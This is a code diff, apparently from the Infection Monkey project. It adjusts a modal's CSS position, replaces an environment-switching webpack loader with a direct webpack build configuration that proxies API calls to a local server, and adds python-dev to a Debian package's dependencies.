@ -406,6 +406,10 @@ body {
padding: 0em; padding: 0em;
} }
.modal-dialog {
top: 30%;
}
/* Print report styling */ /* Print report styling */
@media print { @media print {

View File

@ -1,32 +1,73 @@
'use strict';
const path = require('path'); const path = require('path');
const args = require('minimist')(process.argv.slice(2)); const HtmlWebPackPlugin = require("html-webpack-plugin");
// List of allowed environments module.exports = {
const allowedEnvs = ['dev', 'dist', 'test']; module: {
rules: [
// Set the correct environment {
let env; test: /\.js$/,
if (args._.length > 0 && args._.indexOf('start') !== -1) { exclude: /node_modules/,
env = 'test'; use: {
} else if (args.env) { loader: "babel-loader"
env = args.env; }
} else { },
env = 'dev'; {
} test: /\.css$/,
process.env.REACT_WEBPACK_ENV = env; use: [
'style-loader',
/** 'css-loader'
* Build the webpack configuration ]
* @param {String} wantedEnv The wanted environment },
* @return {Object} Webpack config {
*/ test: /\.(ttf|eot|svg)(\?v=[0-9]\.[0-9]\.[0-9])?$/,
function buildConfig(wantedEnv) { use: {
let isValid = wantedEnv && wantedEnv.length > 0 && allowedEnvs.indexOf(wantedEnv) !== -1; loader: 'file-loader'
let validEnv = isValid ? wantedEnv : 'dev'; }
let config = require(path.join(__dirname, 'cfg/' + validEnv)); },
return config; {
} test: /\.woff(2)?(\?v=[0-9]\.[0-9]\.[0-9])?$/,
use: {
module.exports = buildConfig(env); loader: 'url-loader?limit=10000&mimetype=application/font-woff'
}
},
{
test: /\.(png|jpg|gif)$/,
use: {
loader: 'url-loader?limit=8192'
}
},
{
test: /\.html$/,
use: [
{
loader: "html-loader"
}
]
}
]
},
plugins: [
new HtmlWebPackPlugin({
template: "./src/index.html",
filename: "./index.html"
})
],
resolve: {
extensions: ['.js', '.jsx', '.css'],
modules: [
'node_modules',
path.resolve(__dirname, 'src/')
]
},
output: {
publicPath: '/'
},
devServer: {
proxy: {
'/api': {
target: 'https://localhost:5000',
secure: false
}
}
}
};

View File

@ -5,4 +5,4 @@ Homepage: http://www.guardicore.com
Priority: optional Priority: optional
Version: 1.0 Version: 1.0
Description: Guardicore Infection Monkey Island installation package Description: Guardicore Infection Monkey Island installation package
Depends: openssl, python-pip Depends: openssl, python-pip, python-dev